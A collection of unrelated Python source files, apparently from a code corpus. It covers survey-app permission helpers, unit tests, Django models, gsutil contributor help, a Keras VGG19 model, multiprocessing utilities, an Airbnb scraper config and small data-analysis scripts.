survey.BackgroundImg = random.choice(bkgs)
db.session.commit()
print("Survey meta data added")
return True
def get_survey_permission(survey: Survey, user: User) -> Permission:
"""Get permission of given user for the survey.
:param survey: The survey
:type survey: Survey
:param user: The user whose permissions are to be checked
:type user: User
:return: The user's permissions for the survey
:rtype: Permission
"""
if 'surveys' in session and str(survey.id) in session['surveys']:
return session['surveys'][str(survey.id)]
sp = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
if sp is None and user.Role == 's':
return ADMIN_DEFAULT_PERMISSION
elif sp is None:
return 'n'
return sp.Type
def set_survey_permission(survey: Survey, user: User, permission: Permission, bylink=False):
"""Set permission of given user for survey.
:param survey: The survey
:type survey: Survey
:param user: The user whose permissions are to be set
:type user: User
:param permission: The user's permissions for the survey
:type permission: Permission
:param bylink: Is the permission set because of a link? (default: False)
:type belink: bool
"""
# If the permission is set because of a link, and the user is a guest
# then set it only temporarily, in their session.
if bylink and user.Role == 'g':
if 'surveys' not in session:
session['surveys'] = {}
if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
session['surveys'][survey.id] = 'r'
return
sp = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
if sp is None:
sp = SurveyPermission(SurveyId=survey.id, UserId=user.id)
db.session.add(sp)
if permission != "n":
sp.Type = permission
else:
db.session.delete(sp)
db.session.commit()
def get_report_survey(report: Report) -> Survey:
"""Get survey assigned to the given report
:param report: Report object
:type report: Report
:return: The source survey of the report
:rtype: Survey
"""
if report is None:
raise error.API('no such report')
survey = Survey.query.filter_by(id=report.SurveyId).first()
return survey
def get_report_permission(report: Report, user: User) -> Permission:
"""Get permission of given user for the report.
:param report: The report
:type report: Report
:param user: The user whose permissions are to be checked
:type user: User
:return: The user's permissions for the report
:rtype: Permission
"""
if 'reports' in session and str(report.id) in session['reports']:
return session['reports'][str(report.id)]
rp = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
if rp is None and user.Role == 's':
return ADMIN_DEFAULT_PERMISSION
if rp is None:
return 'n'
return rp.Type
def set_report_permission(report: Report, user: User, permission: Permission, bylink=False):
"""Set permission of given user for report.
:param report: The report
:type report: Report
:param user: The user whose permissions are to be set
:type user: User
:param permission: The user's permissions for the report
:type permission: Permission
:param bylink: Is the permission set because of a link? (default: False)
:type belink: bool
"""
# If the permission is set because of a link, and the user is a guest
# then set it only temporarily, in their session.
if bylink and user.Role == 'g':
if 'reports' not in session:
session['reports'] = {}
if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
session['reports'][report.id] = 'r'
return
rp = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
if rp is None:
rp = ReportPermission(ReportId=report.id, UserId=user.id)
db.session.add(rp)
if permission != "n":
rp.Type = permission
else:
db.session.delete(rp)
db.session.commit()
def create_report(user: User, survey: Survey, name: str, author: int) -> Report:
"""Create report for a given user
:param user: The creator of the report
:type user: User
:param survey: The source survey of the report
:type survey: Survey
:param name: The name of the new report
:type name: str
:param author: The database id of the creator
:type author: int
:return: The newly created report
:rtype: Report
"""
report = Report(Name=name, SurveyId=survey.id, AuthorId=author)
report.BackgroundImg = Survey.query.filter_by(id=survey.id).first().BackgroundImg
db.session.add(report)
db.session.commit()
set_report_permission(report, user, 'o')
return report
def delete_survey(survey: Survey):
"""Delete survey
:param survey: The survey to be deleted
:type survey: Survey
"""
# db_path = 'data/' + str(survey.id) + '.db'
# if os.path.exists(db_path):
# os.remove(db_path)
# xml_path = 'survey/' + str(survey.id) + '.xml'
# if os.path.exists(xml_path):
# os.remove(xml_path)
SurveyPermission.query.filter_by(SurveyId=survey.id).delete()
SurveyGroup.query.filter_by(SurveyId=survey.id).delete()
Survey.query.filter_by(id=survey.id).delete()
db.session.commit()
def delete_report(report: Report):
"""Delete report
:param report: The report to be deleted
:type report: Report
"""
ReportPermission.query.filter_by(ReportId=report.id).delete()
ReportGroup.query.filter_by(ReportId=report.id).delete()
Report.query.filter_by(id=report.id).delete()
db.session.commit()
def open_survey(survey: Survey) -> sqlite3.Connection:
"""Open an SQLite3 connection to the survey database
:param survey: The survey
:type survey: Survey
:return: A connection to the DB of the survey
:rtype: sqlite3.Connection
"""
return sqlite3.connect(f"data/{survey.id}.db")
def get_answers(survey_id: int) -> Dict:
"""Get answers for given survey
:param survey_id: Id of the survey
:type survey: Survey
:return: Answers in the survey
:rtype: Dict
"""
xml = ET.parse(os.path.join(ABSOLUTE_DIR_PATH, f"survey/{survey_id}.xml"))
result = {}
questions = ['single', 'multi', 'groupedsingle']
for q in questions:
for b in xml.getroot().iter(q):
header = b.find('header').text
header = re.sub('</?\w[^>]*>', '', header).strip(' \n')
if header not in result:
result[header]={}
result[header]["question"]=header
result[header]["type"]=q
result[header]["sub_questions"]=[]
result[header]["values"]={}
if 'defaultValue' in b.attrib:
result[header]["values"][b.attrib['defaultValue']]="default"
if q == 'groupedsingle':
for item in b.find('items'):
result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
if q != "multi":
for item in b.find('answers'):
result[header]["values"][item.attrib['code']]=item.attrib['value'].strip(' ')
else:
for item in b.find('answers'):
result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
result[header]["values"]["0"] = "NIE"
result[header]["values"]["1"] = "TAK"
return result
def get_dashboard() -> Dict:
"""Get dashboard for user
:return: Returns dictionary with surveys and reports
:rtype: Dict
"""
user = get_user()
user_surveys = get_user_surveys(user)
result = []
for survey in user_surveys:
author = get_user(survey.AuthorId)
result.append({
'type': 'survey',
'endsOn': survey.EndsOn.timestamp() if survey.EndsOn is not None else None,
'startedOn': survey.StartedOn.timestamp() if survey.StartedOn is not None else None,
'id': survey.id,
'name': survey.Name,
'sharedTo': get_survey_users(survey),
'ankieterId': survey.AnkieterId,
'isActive': survey.IsActive,
'questionCount': survey.QuestionCount,
'backgroundImg': survey.BackgroundImg,
'userId': user.id,
'answersCount': get_answers_count(survey),
'authorId': author.id,
'authorName':author.CasLogin
})
user_reports = get_user_reports(user)
for report in user_reports:
try:
survey = get_survey(report.SurveyId)
except:
continue
author = get_user(report.AuthorId)
result.append({
'type': 'report',
'id': report.id,
'name': report.Name,
'sharedTo': get_report_users(report),
'connectedSurvey': {"id": report.SurveyId, "name": survey.Name},
'backgroundImg': report.BackgroundImg,
'userId': user.id,
'authorId': author.id,
'authorName': author.CasLogin
})
return {"objects": result}
def get_types(conn: sqlite3.Connection) -> Dict[str, str]:
"""Get types for each column in the database.
:param conn: Connection to the database
:type conn: sqlite3.Connection
:return: A dictionary mapping names of columns to SQL names of their types
:rtype: Dict[str, str]
"""
types = {}
cur = conn.cursor()
cur.execute("PRAGMA table_info(data)")
data = cur.fetchall()
for row in data:
types[row[1]] = row[2]
return types
def get_columns(conn: sqlite3.Connection) -> List[str]:
"""Get column names in the order just like it is returned from the DB.
:param conn: Connection to the database
:type conn: sqlite3.Connection
:return: A list of column names in the database.
:rtype: Lis[str]
"""
columns = []
cur = conn.cursor()
cur.execute("PRAGMA table_info(data)")
data = cur.fetchall()
for row in data:
columns.append(row[1])
return columns
def get_answers_count(survey: Survey) -> int:
"""Get number of answers in the database for a given survey.
:param survey: The survey
:type survey: Survey
:return: The number of answers
:rtype: int
"""
conn = open_survey(survey)
cur = conn.cursor()
try:
cur.execute("SELECT * FROM data")
n = len(cur.fetchall())
except:
n = 0
conn.close()
return n
|
python
|
import bitwise as bw
class TestStackPointer:
def test_StackPointer(self):
up = bw.wire.Wire()
down = bw.wire.Wire()
clock = bw.wire.Wire()
output_bus = bw.wire.Bus16()
a = bw.processor.StackPointer(up, down, clock, output_bus)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
down.value = 1
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
down.value = 0
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
up.value = 1
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0)
down.value = 1
clock.value = 0
clock.value = 1
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1)
print(a.__doc__)
print(a)
a(
up=0,
down=1,
clock=0,
output_bus=None
)
a(clock=1)
assert output_bus.wire_values == (
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0)
|
python
|
from django.db import models
class Suggestion(models.Model):
name = models.CharField(max_length=100, unique=True)
class ImageTag(models.Model):
game = models.CharField(max_length=100)
image = models.CharField(max_length=50)
tag = models.CharField(max_length=200)
class Favorite(models.Model):
user = models.ForeignKey('authentication.CustomUser', on_delete=models.CASCADE)
slug = models.CharField(max_length=100)
class Meta:
unique_together = ('user', 'slug')
class Cover(models.Model):
game = models.CharField(max_length=100)
image = models.CharField(max_length=50)
tag = models.CharField(max_length=200)
size = models.IntegerField()
|
python
|
"""
byceps.blueprints.site.core.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from __future__ import annotations
from typing import Optional
from flask import g, url_for
from .... import config
from ....services.party import service as party_service
from ....services.site import service as site_service
from ....util.framework.blueprint import create_blueprint
from ....util.user_session import get_current_user
blueprint = create_blueprint('core_site', __name__)
@blueprint.app_template_global()
def url_for_site_file(filename, **kwargs) -> Optional[str]:
"""Render URL for a static file local to the current site."""
site_id = getattr(g, 'site_id', None)
if site_id is None:
return None
return url_for('site_file', site_id=site_id, filename=filename, **kwargs)
@blueprint.before_app_request
def prepare_request_globals() -> None:
site_id = config.get_current_site_id()
site = site_service.get_site(site_id)
g.site_id = site.id
g.brand_id = site.brand_id
party_id = site.party_id
if party_id is not None:
g.party = party_service.get_party(party_id)
party_id = g.party.id
g.party_id = party_id
required_permissions: set[str] = set()
g.user = get_current_user(required_permissions)
|
python
|
from .qtscraper import *
from ._version import __version__
def setup(app):
from .qtgallery import setup
return setup(app)
|
python
|
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about contributing code to gsutil."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>OVERVIEW</B>
We're open to incorporating gsutil code changes authored by users. Here
are some guidelines:
1. Before we can accept code submissions, we have to jump a couple of legal
hurdles. Please fill out either the individual or corporate Contributor
License Agreement:
- If you are an individual writing original source code and you're
sure you own the intellectual property,
then you'll need to sign an individual CLA
(https://cla.developers.google.com/about/google-individual).
- If you work for a company that wants to allow you to contribute your
work to gsutil, then you'll need to sign a corporate CLA
(https://cla.developers.google.com/about/google-corporate)
Follow either of the two links above to access the appropriate CLA and
instructions for how to sign and return it. Once we receive it, we'll
add you to the official list of contributors and be able to accept
your patches.
2. If you found a bug or have an idea for a feature enhancement, we suggest
you check https://github.com/GoogleCloudPlatform/gsutil/issues to see if it
has already been reported by another user. From there you can also
subscribe to updates to the issue by clicking the "Watch thread" button at
the bottom of the page.
3. It's usually worthwhile to send email to [email protected] about your
idea before sending actual code. Often we can discuss the idea and help
propose things that could save you later revision work.
4. We tend to avoid adding command line options that are of use to only
a very small fraction of users, especially if there's some other way
to accommodate such needs. Adding such options complicates the code and
also adds overhead to users having to read through an "alphabet soup"
list of option documentation.
5. While gsutil has a number of features specific to Google Cloud Storage,
it can also be used with other cloud storage providers. We're open to
including changes for making gsutil support features specific to other
providers, as long as those changes don't make gsutil work worse for Google
Cloud Storage. If you do make such changes we recommend including someone
with knowledge of the specific provider as a code reviewer (see below).
6. You can check out the gsutil code from the GitHub repository:
https://github.com/GoogleCloudPlatform/gsutil
To clone a read-only copy of the repository:
git clone git://github.com/GoogleCloudPlatform/gsutil.git
git submodule update --init --recursive
To push your own changes to GitHub, click the Fork button on the
repository page and clone the repository from your own fork.
7. The gsutil git repository uses git submodules to pull in external modules.
After checking out the repository, make sure to also pull the submodules
by entering into the gsutil top-level directory and run:
git submodule update --init --recursive
8. Please make sure to run all tests against your modified code. To
do this, change directories into the gsutil top-level directory and run:
./gsutil test
The above tests take a long time to run because they send many requests to
the production service. The gsutil test command has a -u argument that will
only run unit tests. These run quickly, as they are executed with an
in-memory mock storage service implementation. To run only the unit tests,
run:
./gsutil test -u
If you made changes to boto, please run the boto tests. For these tests you
need to use HMAC credentials (from gsutil config -a), because the current
boto test suite doesn't import the OAuth2 handler. You'll also need to
install some python modules. Change directories into the boto root
directory at third_party/boto and run:
pip install -r requirements.txt
(You probably need to run this command using sudo.)
Make sure each of the individual installations succeeded. If they don't
you may need to run the install command again.
Then ensure your .boto file has HMAC credentials defined (the boto tests
don't load the OAUTH2 plugin), and then change directories into boto's
tests directory and run:
python test.py unit
python test.py -t s3 -t gs -t ssl
9. Please consider contributing test code for your change, especially if the
change impacts any of the core gsutil code (like the gsutil cp command).
10. When it's time to send us code, please use the Rietveld code review tool
rather than simply sending us a code patch. Do this as follows:
- Check out the gsutil code from your fork of the gsutil repository and
apply your changes.
- Download the "upload.py" script from
https://github.com/rietveld-codereview/rietveld
- Run upload.py from your git directory with the changes.
- Click the codereview.appspot.com link it generates, click "Edit Issue",
and add [email protected] as a reviewer, and Cc [email protected].
- Click Publish+Mail Comments.
- Once your changes are accepted, submit a pull request on GitHub and we
will merge your commits.
""")
class CommandOptions(HelpProvider):
"""Additional help about contributing code to gsutil."""
# TODO: gsutil-beta: Add lint .rc file and linting instructions.
# Help specification. See help_provider.py for documentation.
help_spec = HelpProvider.HelpSpec(
help_name='dev',
help_name_aliases=[
'development', 'developer', 'code', 'mods', 'software'],
help_type='additional_help',
help_one_line_summary='Contributing Code to gsutil',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
|
python
|
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers.convolutional import Conv2D, MaxPooling2D
class VGG19(Sequential):
def __init__(self):
super().__init__()
self.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(224, 224, 3), padding='same', activation='relu'))
self.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2)))
self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2)))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2), name="VGG19_Pool3"))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(MaxPooling2D(pool_size=(2, 2)))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
self.add(Flatten())
self.add(Dense(4096, activation='relu'))
self.add(Dropout(0.5))
self.add(Dense(4096, activation='relu'))
self.add(Dropout(0.5))
self.add(Dense(1000, activation='softmax'))
self.compile(loss='categorical_crossentropy', optimizer='SGD', metrics=['accuracy'])
self.summary()
|
python
|
import sys
import time
import numpy as np
import pandas as pd
import datetime as dt
import multiprocessing as mp
class MultiProcessingFunctions:
""" This static functions in this class enable multi-processing"""
def __init__(self):
pass
@staticmethod
def lin_parts(num_atoms, num_threads):
""" This function partitions a list of atoms in subsets (molecules) of equal size.
An atom is a set of indivisible set of tasks.
Reference: Snippet 20.6 (page 308)
"""
# partition of atoms with a single loop
parts = np.linspace(0, num_atoms, min(num_threads, num_atoms) + 1)
parts = np.ceil(parts).astype(int)
return parts
@staticmethod
def nested_parts(num_atoms, num_threads, upper_triangle=False):
""" This function enables parallelization of nested loops.
Reference: Snippet 20.5 (page 306)
"""
# partition of atoms with an inner loop
parts = []
num_threads_ = min(num_threads, num_atoms)
for num in range(num_threads_):
part = 1 + 4 * (parts[-1] ** 2 + parts[-1] + num_atoms * (num_atoms + 1.) / num_threads_)
part = (-1 + part ** .5) / 2.
parts.append(part)
parts = np.round(parts).astype(int)
if upper_triangle: # the first rows are heaviest
parts = np.cumsum(np.diff(parts)[::-1])
parts = np.append(np.array([0]), parts)
return parts
@staticmethod
def mp_pandas_obj(func, pd_obj, num_threads=24, mp_batches=1, lin_mols=True, **kargs):
""" Parallelize jobs, return a dataframe or series
Example: df1=mp_pandas_obj(func,('molecule',df0.index),24,**kwds)
Reference: Snippet 20.7 (page 310)
:param func: (string) function to be parallelized
:param pd_obj: (vector) Element 0, is name of argument used to pass the molecule;
Element 1, is the list of atoms to be grouped into a molecule
:param num_threads: (int) number of threads
:param mp_batches: (int) number of batches
:param lin_mols: (bool) Tells if the method should use linear or nested partitioning
:param kargs: (var args)
:return: (data frame) of results
"""
if lin_mols:
parts = MultiProcessingFunctions.lin_parts(len(pd_obj[1]), num_threads * mp_batches)
else:
parts = MultiProcessingFunctions.nested_parts(len(pd_obj[1]), num_threads * mp_batches)
jobs = []
for i in range(1, len(parts)):
job = {pd_obj[0]: pd_obj[1][parts[i - 1]:parts[i]], 'func': func}
job.update(kargs)
jobs.append(job)
if num_threads == 1:
out = MultiProcessingFunctions.process_jobs_(jobs)
else:
out = MultiProcessingFunctions.process_jobs(jobs, num_threads=num_threads)
if isinstance(out[0], pd.DataFrame):
df0 = pd.DataFrame()
elif isinstance(out[0], pd.Series):
df0 = pd.Series()
else:
return out
for i in out:
df0 = df0.append(i)
df0 = df0.sort_index()
return df0
@staticmethod
def process_jobs_(jobs):
""" Run jobs sequentially, for debugging """
out = []
for job in jobs:
out_ = MultiProcessingFunctions.expand_call(job)
out.append(out_)
return out
@staticmethod
def expand_call(kargs):
""" Expand the arguments of a callback function, kargs['func'] """
func = kargs['func']
del kargs['func']
out = func(**kargs)
return out
@staticmethod
def report_progress(job_num, num_jobs, time0, task):
# Report progress as asynch jobs are completed
msg = [float(job_num) / num_jobs, (time.time() - time0)/60.]
msg.append(msg[1] * (1/msg[0] - 1))
time_stamp = str(dt.datetime.fromtimestamp(time.time()))
msg = time_stamp + ' ' + str(round(msg[0]*100, 2)) + '% '+task+' done after ' + \
str(round(msg[1], 2)) + ' minutes. Remaining ' + str(round(msg[2], 2)) + ' minutes.'
if job_num < num_jobs:
sys.stderr.write(msg+'\r')
else:
sys.stderr.write(msg+'\n')
return
@staticmethod
def process_jobs(jobs, task=None, num_threads=24):
""" Run in parallel. jobs must contain a 'func' callback, for expand_call"""
if task is None:
task = jobs[0]['func'].__name__
pool = mp.Pool(processes=num_threads)
# outputs, out, time0 = pool.imap_unordered(MultiProcessingFunctions.expand_call,jobs),[],time.time()
outputs = pool.imap_unordered(MultiProcessingFunctions.expand_call, jobs)
out = []
time0 = time.time()
# Process asyn output, report progress
for i, out_ in enumerate(outputs, 1):
out.append(out_)
MultiProcessingFunctions.report_progress(i, len(jobs), time0, task)
pool.close()
pool.join() # this is needed to prevent memory leaks
return out
|
python
|
#!/usr/bin/python3
# ============================================================================
# Airbnb Configuration module, for use in web scraping and analytics
# ============================================================================
import logging
import os
import configparser
import sys
from bnb_kanpora.models import RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel
from playhouse.sqlite_ext import SqliteExtDatabase
MODELS = [RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel]
logger = logging.getLogger()
class Config():
def __init__(self, config_file=None, verbose=False):
""" Read the configuration file <username>.config to set up the run
"""
self.config_file = config_file
self.log_level = logging.DEBUG if verbose else logging.INFO
self.URL_ROOT = "https://www.airbnb.com/"
self.URL_ROOM_ROOT = self.URL_ROOT + "rooms/"
self.URL_HOST_ROOT = self.URL_ROOT + "users/show/"
self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
self.SEARCH_LISTINGS_ON_FULL_PAGE = 18
self.HTTP_PROXY_LIST = []
self.GOOGLE_API_KEY = None
self.AWS_KEY = None
self.AWS_SECRET = None
self.USE_ROTATING_IP = False
try:
config = configparser.ConfigParser()
if self.config_file is None:
# look for username.config on both Windows (USERNAME) and Linux (USER)
self.config_file = "app.config"
if not os.path.isfile(self.config_file):
logging.error("Configuration file %s not found.", self.config_file)
sys.exit()
config.read(self.config_file)
# database
try:
self.database = SqliteExtDatabase(f'{config["DATABASE"]["db_name"]}.db', pragmas=(
('cache_size', -1024 * 64), # 64MB page-cache.
('journal_mode', 'wal'), # Use WAL-mode (you should always use this!).
('foreign_keys', 1)) # Enforce foreign-key constraints.
)
self.database.bind(MODELS)
self.database.connect()
self.database.create_tables(MODELS)
except Exception:
logger.error("Incomplete database information in %s: cannot continue",
self.config_file)
sys.exit()
# network
try:
self.HTTP_PROXY_LIST = config["NETWORK"]["proxy_list"].split(",")
self.HTTP_PROXY_LIST = [x.strip() for x in self.HTTP_PROXY_LIST]
# Remove any empty strings from the list of proxies
self.HTTP_PROXY_LIST = [x for x in self.HTTP_PROXY_LIST if x]
except Exception:
logger.warningf("No proxy_list in {self.config_file}: not using proxies")
self.HTTP_PROXY_LIST = []
try:
self.USER_AGENT_LIST = config["NETWORK"]["user_agent_list"].split(",,")
self.USER_AGENT_LIST = [x.strip() for x in self.USER_AGENT_LIST]
self.USER_AGENT_LIST = [x.strip('"') for x in self.USER_AGENT_LIST]
except Exception:
logger.info(f"No user agent list in {config_file}: not using user-agents")
self.USER_AGENT_LIST = []
self.MAX_CONNECTION_ATTEMPTS = int(config["NETWORK"]["max_connection_attempts"])
self.REQUEST_SLEEP = float(config["NETWORK"]["request_sleep"])
self.HTTP_TIMEOUT = float(config["NETWORK"]["http_timeout"])
try:
self.URL_API_SEARCH_ROOT = config["NETWORK"]["url_api_search_root"]
except:
logger.warning("Missing config file entry: url_api_search_root.")
logger.warning("For more information, see example.config")
self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
try:
self.API_KEY = config["NETWORK"]["api_key"]
except:
logger.warning("Missing config file entry: api_key.")
logger.warning("For more information, see example.config")
self.API_KEY = None
if self.API_KEY is None or self.API_KEY=="":
self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
try:
self.CLIENT_SESSION_ID = config["NETWORK"]["client_session_id"]
except:
logger.warning("Missing config file entry: client_session_id.")
logger.warning("For more information, see example.config")
self.CLIENT_SESSION_ID = None
# survey
self.SEARCH_MAX_PAGES = int(config["SURVEY"]["search_max_pages"])
self.SEARCH_MAX_GUESTS = int(config["SURVEY"]["search_max_guests"])
self.RE_INIT_SLEEP_TIME = float(config["SURVEY"]["re_init_sleep_time"])
# account
try:
self.GOOGLE_API_KEY = config["ACCOUNT"]["google_api_key"]
except:
logger.warning("Missing config file entry: Google API Key. Needed only for geocoding")
logger.warning("For more information, see example.config")
try:
self.AWS_KEY = config["ACCOUNT"]["aws_key"]
self.AWS_SECRET = config["ACCOUNT"]["aws_secret"]
except:
logger.warning(
"Missing config file entry: AWS API Key. Needed only for proxies")
logger.warning("For more information, see example.config")
except Exception:
logger.exception("Failed to read config file properly")
raise
|
python
|
import _hgdb
class DebugSymbolTableException(Exception):
def __init__(self, what):
super().__init__(what)
# wrapper class
class DebugSymbolTable:
def __init__(self, filename):
self.db = _hgdb.init_debug_db(filename)
def store_variable(self, id_: int, value: str, is_rtl: bool = True):
_hgdb.store_variable(self.db, id_, value, is_rtl)
def store_breakpoint(self, id_: int, instance_id: int, filename: str, line_num: int, column_num: int = 0,
condition: str = "", trigger: str = ""):
# check instance id
if not self.has_instance_id(instance_id):
raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
_hgdb.store_breakpoint(self.db, id_, instance_id, filename, line_num, column_num, condition, trigger)
def store_instance(self, id_: int, full_name: str, annotation: str = ""):
_hgdb.store_instance(self.db, id_, full_name, annotation)
def store_scope(self, id_: int, *args: int):
for breakpoint_id in args:
if not self.has_breakpoint_id(breakpoint_id):
raise DebugSymbolTableException(f"Breakpoint {breakpoint_id} does not exist!")
_hgdb.store_scope(self.db, id_, *args)
def store_context_variable(self, name: str, breakpoint_id: int, variable_id: int):
if not self.has_breakpoint_id(breakpoint_id):
raise DebugSymbolTableException(f"Breakpoint {breakpoint_id} does not exist!")
if not self.has_variable_id(variable_id):
raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
_hgdb.store_context_variable(self.db, name, breakpoint_id, variable_id)
def store_generator_variable(self, name: str, instance_id: int, variable_id: int, annotation: str = ""):
if not self.has_instance_id(instance_id):
raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
if not self.has_variable_id(variable_id):
raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
_hgdb.store_generator_variable(self.db, name, instance_id, variable_id, annotation)
# checkers
def has_instance_id(self, id_):
return _hgdb.has_instance_id(self.db, id_)
def has_breakpoint_id(self, id_):
return _hgdb.has_breakpoint_id(self.db, id_)
def has_variable_id(self, id_):
return _hgdb.has_variable_id(self.db, id_)
# get other information
def get_filenames(self):
return _hgdb.get_filenames(self.db)
# transaction based insertion
def begin_transaction(self):
return _hgdb.begin_transaction(self.db)
def end_transaction(self):
return _hgdb.end_transaction(self.db)
|
python
|
#This program takes a csv file of financial data as input and produces
#a statistical report stored to a csv file and printed to the terminal.
#The input file must contain a series of months with corresponding profits
#and losses. The output report includes the total number of months analyzed,
#the net total amount of "Profit/Losses" over the entire period, the average
#of the changes in "Profit/Losses" over the entire period, and the greatest
#increase and greatest decrease in profits (date and amount) over the entire
#period.
import csv
import os
month_list = []
month_count = 0
net_profit = 0
greatest_profit = 0
greatest_loss = 0
#Store relative path of csv
csvpath = "Resources/budget_data.csv"
#Open csv file, skipping over header row
with open(csvpath) as data_file:
next(data_file)
data_rows = csv.reader(data_file, delimiter = ',')
#Loop through csv
for row in data_rows:
#Count months by accummulating them into a list (ommit any duplicates)
if row[0] not in month_list:
month_list.append(row[0])
month_count += 1
#Accummulate net profit
net_profit = net_profit + int(row[1])
#As greater profits are found, replace current greatest
if int(row[1]) > greatest_profit:
greatest_profit = int(row[1])
greatest_profit_info = [row[0], row[1]]
#As greater losses are found, replace current greatest
elif int(row[1]) < greatest_loss:
greatest_loss = int(row[1])
greatest_loss_info = [row[0], row[1]]
#Organize results into formatted report
report = f"Total months: {str(month_count)}"\
f"\nNet profit: {str(net_profit)}"\
f"\nAverage change: {round(net_profit / month_count, 2)}"\
f"\nGreatest increase in profit: {greatest_profit_info[1]} on {greatest_profit_info[0]}"\
f"\nGreatest decrease inprofit: {greatest_loss_info[1]} on {greatest_loss_info[0]}"
#Print report to terminal and new csv file
print(report)
output_directory = "Analysis"
os.chdir(output_directory)
with open('banking_results.csv', 'w', newline='') as output_file:
output_file.write(report)
|
python
|
import numpy as np
import tensorflow as tf
import time
# Load TFLite model and allocate tensors.
interpreter = tf.lite.Interpreter(model_path="output/model.tflite")
interpreter.allocate_tensors()
# Get input and output tensors.
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
# Test model FPS on random input data.
input_shape = input_details[0]['shape']
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
start = time.time()
for idx in range(10):
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
# The function `get_tensor()` returns a copy of the tensor data.
# Use `tensor()` in order to get a pointer to the tensor.
output_data = interpreter.get_tensor(output_details[0]['index'])
print(output_data.shape)
end = time.time()
print(end-start)
# cap = cv2.VideoCapture('/home/anurag/lightspeed/data/pushup-random.mp4')
# while(cap.isOpened()):
# ret, frame = cap.read()
# resized = cv2.resize(frame, (192, 192) , interpolation = cv2.INTER_LINEAR)
# cv2.imshow('frame', resized)
